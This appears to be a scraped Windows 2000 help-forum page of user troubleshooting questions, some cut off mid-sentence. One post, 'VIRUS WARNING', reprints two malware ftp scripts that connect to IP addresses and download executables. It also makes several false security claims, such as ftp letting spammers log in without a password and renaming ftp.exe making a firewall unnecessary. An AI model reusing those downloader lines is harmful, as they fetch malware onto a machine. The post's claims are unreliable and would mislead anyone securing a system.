Running Windows 2000 on the new Intel cpu's
Does anyone have any knowledge or experience of running Windows 2000 on the
newer Intel Duo and Quad processors? Will I have difficulties migrating my
programs or even installing Windows 2000 on these cpu based boards?

Repost: Popup during Copy/Move
SP 4
In Windows Explorer Tools/Folder Options/View/Advanced settings: the check
box labeled "Show pop-up description for folder and desktop items" is
UNCHECKED. That is my default. It always has been since I installed Windows
2000.
But starting a few days ago, I now get a pop-up showing the filename when I
drag the cursor in COPY/MOVE operations with any type of file.
How do I kill this popup function?
Since the normal setting above does not seem to be working, is there a
registry key that controls this, or some other setting?

Install Avast as administrator, full functionality as power user?
Is anyone aware of any issues with installing the Avast antivirus home
edition as administrator, then mostly operating under a power user
environment? I'm trying to get a heads-up on assumptions that may
have gone into the design of the application e.g. assuming a single-

curtailment of functionality when Avast is installed as admin, but the

file corruption and other problems
I'm using Windows 2000 with DOS v5 and have one serious problem and a
couple of small ones. I had about 500 jpgs which I transferred from my
old machine, mostly of album covers and musicians etc. Almost all of
them have somehow become corrupted and unreadable. Worse than t hat,
some save under different names; I don't know how this came about, and
am extremely worried about this. The last time I had a problem like
this was with WordStar restoring from floppies donkeys years ago.
I am also unable to get long file names onmy machine, and video sites
such as Youtube and other media play too fast.
Can anyone offer any advice on this? My priority is to restore the
jpgs and to prevent further file corruption. Tag: All about Microsoft Certified Systems Engineer (MCSE) Tag: 563497
can't boot windows 2000, stop error 0x0000006B
Hello--
I have never had any real problems with my windows 2000 machine (I
actually prefer it to my work machine, which runs XP), until I tried
to burn a video CD with Nero the other day. The machine completely
locked up, was totally unresponsive to CTRL ALT DEL, and it wouldn't
even respond to the power button. I disconnected the power supply,
and now when I try to reboot it gets a few seconds into the Windows
2000 Professional screen, then it flips to a blue screen with the
following:
*** STOP: 0x0000006B (0xC0000033,0x00000002,0x00000000,0x00000000)
PROCESS1_INITIALIZATION_FAILED
...followed by instructions to reboot the machine in Safe Mode, but it
can't even do that. I have not installed any new hardware in months
and months (the last hardware installed was a CD burner that has
burned hundreds of audio CDs--with the same Nero software that I used
to burn a video CD when the machine locked up--over the past 2 years
or so since I installed it; I did install a KVM switch to go between
this win2000 machine and my work machine, but that has been in regular
constant use for 6-8 months with no problems), but this error seems to
have been related to the video CD creation function in the Nero
program.
Any ideas how I can at least salvage the data on that machine? I do
have a back-up, but it is a little old, and there's some data on the
machine that has since been added that I would really like to
retrieve...any help would be greatly appreciated!!

No defrag on files that admin hasn't permissions to
I'm running Windows 2000 Professional, SP4, and almost always use a
power user account. I mostly operate within a Unix environment
provided by Cygwin. In accordance with a common Unix practice, all my
power user files are set to be accessible by only the user. However,
this prevents those files from being defragged. After much searching
and experimentation, I found in JkDefrag's documentation that the
account under which defragging is run should have "full control" over
files being defragged.
I've tried the Win2K's built-in defragger, JkDefrag, and Ultra
Defragmenter (UD). For JkDefrag and UD, I also tried boot-time
defragging. UD requires specification of a comma-separated list of
file patterns, to which I added an asterisk (without quotes). None of
these help.
I confirmed that the fragmented files could be defragged after using
the Unix Bash command line interpeter in Cygwin to open up file access
to everyone ("go+rwx" in Unix lingo). Other people, however, haven't
needed to do this, including people who have finangled file access
permissions even more un-Windows-ily than I have. So I'm not sure
what could be the cause of the problem.
1. What other likely causes could there be?
2. Is there a defragger that is known to circumvent these file access
permissions problems? Freeware is preferrable, since this is an
ancient laptop for which investment is questionable. It might be
better to simply run it into the ground (or until my patience is
exhausted), then get a new laptop with twice the drive capacity I
need so that I can ghost the drive between two partitions instead
of this troublesome and nonideal defragging. On the current
laptop, ghosting might be problematic because it only has USB1
(haven't researched yet whether the CD burner is on IDE).
3. Failing that, is there a way to hierarchically traverse the C-drive
and set file permissions such that "full control" is given to
*only* admin?

98SE upgrade to 2000
I have several machines that have 98SE on them. One in particular didn't get
heavy use, but now the 14 yr. old is doing his best to give it a workout
(ASUS A7V600X-E Sempron2400 w/ 512 PC3200DDR).
I have a copy of 2000 Pro Upgrade here that I was going to use quite a few
years back, but never did (went with XP for that machine) and I was
considering putting it on his machine for a number of reasons (like I want
to add NAS to my wired router and I want to buy Office 2007 Student to put
on there for him and etc.) I am aware that a clean install is always best,
but in this instance I do not have the time to invest in starting him over
from scratch so I may do an upgrade as the next best thing.
His C drive is 13G and he currently uses about 8.5G for windows and
programs... his graphics files and such are on D.
How much further will 2000 gobble up his C drive as an Upgrade?
How about space needed to put Office Student 07 over 97Pro?
Will it install to a FAT (was 98SE FAT32?) drive? I would like to keep all
the machines in the house using the same file format and so my XP machines
are also FAT.

Group Policy Not Working for just one user...
We have a group policy configured on our network that includes a
folder redirection policy. Basically it redirects everyone's My
Documents folder to a central folder under their name on our server.
This makes sure everything gets backed up.
We've had this folder redirection in place for the past 7 years and
it's worked fine.
We discovered today however that one of our users My Documents folders
has never been redirected. We only found this out after we formatted
this particular user's computer and they ended up with no documents.
Their my documents folder on the server was basically empty.
Whilst we can't retrieve the data and this is no major problem I'm
concerned as to why the folder redirection for this particular user
has failed. The user account has been in use for I'd say the last 5
years and many users have been created since and everyone elses
account redirects fine.
Locally the user is a member of the Power Users group, as is everyone
else.
All the other group policy settings are working fine - standard
desktop icons, standard start menu, standard wallpaper etc.
Can anyone suggest some reasons for the issue with the my documents
redirection?

Slow boot, but only in safe mode
This is the opposite of what one would expect. That is, if one is
experiencing a slow boot, going to safe mode would be relatively
quicker. I'm experiencing the opposite. I boot up in the normal
amount of time (which is never fast enough, but that's a different
issue). It is only when I boot up in safe mode that I actually fall
asleep waiting for it to boot up. The task manager shows a sparse
list of processes, as one expects of safe mode. What would cause this
counter-intuitive result of slowness, but only when booting in safe

Terminal Services sessions timeout?
I used to remotely administrate a Windows 2000 server with TightVNC.
With TightVNC, I could log onto the server and start processes that
run in DOS windows, lock the server and disconnect. I could then
reconnect later on to the same session.
Since the server was rebuilt, I am having to use Remote Desktop from a
Windows XP client to administer the server. The problem with this is
that it appears that these Remote Desktop sessions are timing out. I
say this because when I remotely connect to the server I find no
evidence that the processes that run in DOS windows are still
running. The DOS windows have disappeared, and when I start the
processes they begin a catch-up process that would not be necessary
had they been running continuously.
I have tried reinstalling TightVNC as a system service, but when I
reboot the server and attempt a connection, I am informed that the
server does not have a password set and until one is set I won't be
able to connect to it. This is spite of having set the password!
Any thoughts on the solution to either the Remote Desktop or TightVNC
problem would be most gratefully received! Tag: All about Microsoft Certified Systems Engineer (MCSE) Tag: 563421

missing pagefile.sys
On reboot yesterday, the first in some weeks, Windows 2000 5.00.2195 SP4
encountered the subject: error exactly as described in
http://support.microsoft.com/?id=315270
Efforts to follow the remedy stated are meeting difficulties. The pagefile
is indeed defined and of size 800-1000 MB , the computer name is "w2k2." as
it's been since inception several years ago.
The difficulty starts in Step 3-f, as we don't have a "Computer Name" tab in
the System Properties dialog, but it's possible to rationalize using the
"Network Identification" tab instead, as it's the only possibility that
makes sense.
The larger difficulty comes in step 4, as there is no "File menu" from which
to make the subsequent selections.
What are we missing here please? There are a few services which haven't
started due to "Error 5: Access is Denied" problems, and that's what
prompted the reboot in the first place. Things are rather awkward as the
machine is headless; we normally access it using the "VNC server" service,
but that's one of the services that can't start.
Is there any help available please? Tag: All about Microsoft Certified Systems Engineer (MCSE) Tag: 563370
Changing the Windows Explorer View to 'List' from 'icons'
Hello,
Windows 2000 SP4, Windows XP SP2, Windows 2003 AD Domain in Windows 2000 mode.
I've written a script that changes the windows explorer view to 'list'. It
works by writing values to the 'Streams' key in HKCU and seems to work fine
when I run this as an administrator.
However, when I login as a non-administrator, the view is still 'icons'.
I have written a second script to interrogate the registry to verify that
the changes that I made had been written successfully - they had.
Given that the non-administrator user has group policy settings applied to
them, would this be the reason why my registry changes are not taking effect?
As far as I can tell, there is no mention of the 'Streams' key in the ADM
files that are applied to the client/user.
The following policies are applied to Windows Explorer and seem to update
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Do not track shell shortcuts during roaming
Hide these drives in My Computer
Hide Manage on Explorer contect menu
No 'Computers Near Me' in Network Places
No 'Entire Network' in Network Places
Prevent access to these drives in My Computer
Remove DFS, Hardware Tabs
Remove Search
Remove UI to change Keyboard navigation indicator and menu animation settings
Remove Folder Options on tools
Turn on Classic Shell
I have performed a test and updated my scripts to write to the 'Policies'
Key (by adding the user to an administrative group). The results were that
the registry entries were created, but again, no change was made in Windows
Explorer
Also I could not find a policy that defined the Windows Explorer view,
otherwise I would have used that as a method of setting the view for the user.
I've included below the script that modifies the registry - It does a check
for XP or 2000 as we have both clients in our environment.
Any help would be appreicated either in suggesting an alternative method of
changing the explorer view, or suggestions why the registry changes are not
being 'read' or 'applied' by users who have the GPO's applied.

*** VIRUS WARNING!!! ***
I have discovered how Spammers are able to access people's Computers to spew
out their Spyware garbage, and it is Microsoft's OS which has made this
possible! Spammers utilize two commands: the "nslookup" Command and the
"ftp" Command found in c:\winnt\system32 -- which you can review in the
Windows Help Menu. Spammers can also use a HTML E-Mail you open on your
Computer while logged onto the Internet to download a Virus. Those E-Mails
you get from friends telling you to forward it on to others, in order to get
good luck or money, are nothing but a SCAM perpetrated by the Spammers!
DELETE those E-Mails -- DO NOT open them!!! Last month after separately
opening two of those E-Mails, I ended up with a Virus on my Computer spewing
out data over the Internet, and also the following two Text Files given the
name "i" under the 'winnt' Directory.
--- \winnt\i
open 136.145.69.79 2755
user 1 1
get kp.exe
quit
--- \winnt\i
open 208.111.5.228 2755
user 1 1
get 2k3.exe
quit
---
The Virus Commands I subsequently found under the 'winnt' or 'system32'
Directories corresponded to the two ".exe" Files named in those two Text
Files. I didn't know where those 4 Command Lines in those "i" Files were
executable until just today when I looked up the "ftp" Command in Help.
Those are 4 sub-commands which caused my Computer to open up the said IP
Address and Port#, log in as the user 1 1, download the Virus Command, and
then quit "ftp". Since I'm a Dial-up user, I immediately noticed something
wrong because this immediately clogged up my Internet Connection. A High
Speed user might not notice anything!
It is unbelievable, but the "ftp" Command enables the Spammer to log onto
your Computer WITHOUT using an ID and Password! Further, "ftp" enables the
Spammer to prevent you from seeing what it is doing on your Computer!!! I'm
not kidding! Further still, the "nslookup" Command enables the Spammer to
find out your IP Numbers and Computer ID so that he can use the "ftp"
Command! It is as if Microsoft specifically designed these two Commands to
help Spammers! As far as I can tell, you cannot disable either of these
Commands. You can rename "ftp.exe" to "ftp.exe.rename" and "nslookup.exe" to
"nslookup.exe.rename" in order to make them non-executable, but I don't think
this will solve the problem. Would a Microsoft Corporation technician please
inform us if these two Command functions can be disabled? If not, Microsoft
needs to IMMEDIATELY provide a Service Pack or update to enable these two
functions to be disabled using the "net stop / start" Command. With these
functions disabled, a Firewall Application becomes completely unnecessary! Tag: All about Microsoft Certified Systems Engineer (MCSE) Tag: 563362
ip config
hi to all,
i'm having trouble setting up my wireless network between my 2
computers; the main one runs W2k and the smaller one runs XP pro. both
computers tell me that they are running and connected but i cannot find
them on 'computers near me' on either machine nor can i see folders of
the connected machines.
checking the Event Viewer on the W2k computer i see an error with the
message: Your computer has automatically configured the IP address for
the network card with the network address of 00E04CCC3533. The IP
address being used is 169.254.47.74. can you tell me if this is my
problem ?

background won't stick
I have read the various posts on this issue but none fits exactly.
Computer is operating on Windows XP connected to a server with full
admin rights to the local machine.
If we change the background it sticks for a while but then changes by
itself and sort of tiles the image, but not exactly. It divides the
large full screen picture and puts the bottom right corner of the
picture in the top left corner of the screen and the top left part of
the picture in the lower right corner of the machine.
For example we put the coffee bean back ground on and it does fine for
a while and later it will have the moon back ground image, divided as
desribed above.
I looked for the Active Desktop content check box and I don't see
that under any of the tabs.
any suggestions would be appreciated. Tag: All about Microsoft Certified Systems Engineer (MCSE) Tag: 563354
Setting the NUM LOCK Startup State
My setup screen for my motherboard doesn't have an option for setting the
state of NUM LOCK when starting Windows. Is there a way to set that through
Windows 2000 or in the Registry? Tag: All about Microsoft Certified Systems Engineer (MCSE) Tag: 563339
How do I remove the dual boot option?
I have an old Win98 machine that is being donated to some kids. I wiped the
drive and put a fresh install of Win98 from the original CD. I then
upgraded it to Windows 2000 with the upgrade CD we bought a few years later.
However when I upgraded I had the choice of totally removing W98 or adding
Win2K to Win98. I chose total removal of Win98, and convert to NTFS file
system.
Now when I boot it asks me whether I want to use Microsoft Windows 2000 or
Microsoft Windows.
I didn't want this to be a dual boot machine. There is a Windows folder and
a WINNT folder. How do I remove Windows98 completely (very small hard
drive) and remove the dual boot option at the beginning so it only knows
Windows 2000? Tag: All about Microsoft Certified Systems Engineer (MCSE) Tag: 563330
locked out by a LAN?
I was setting up a LAN in my home and when I turned on 1 computer running
win2k I got the CTRL+ALT+Delete screen and then it wanted a passport. I
swear, I have NEVER put a password on this machine and I have had it
since2002. This has to be related to setting up the LAN. Bill Tag: All about Microsoft Certified Systems Engineer (MCSE) Tag: 563320
Repeat on boot-up
Hey all...I have a kind of old HP at home with Windows 2000 Pro. I ran a
virus scan the other day and found I had infected .dll files that couldn't be
repaired. I chose to delete some of them, stupidly, and now the system goes
into a loop when I power on. It shows the HP logo, then the WIndows 2000
loading screen (the bar fills up all the way), and then a blue screen and
repeats over and over again. The F8 options do nothing. Is there any way
around this without having to reinstall Windows, because it wasn't mine and
therefore don't have the reinstall software. Thanks! Tag: All about Microsoft Certified Systems Engineer (MCSE) Tag: 563318
pop3 and smtp ports
I have Windows 2003 server and installed the POP3 service. How do I change
the ports that are used for the POP3 and SMTP service? I want to change
them to:
pop3 = 995
smpt = 465
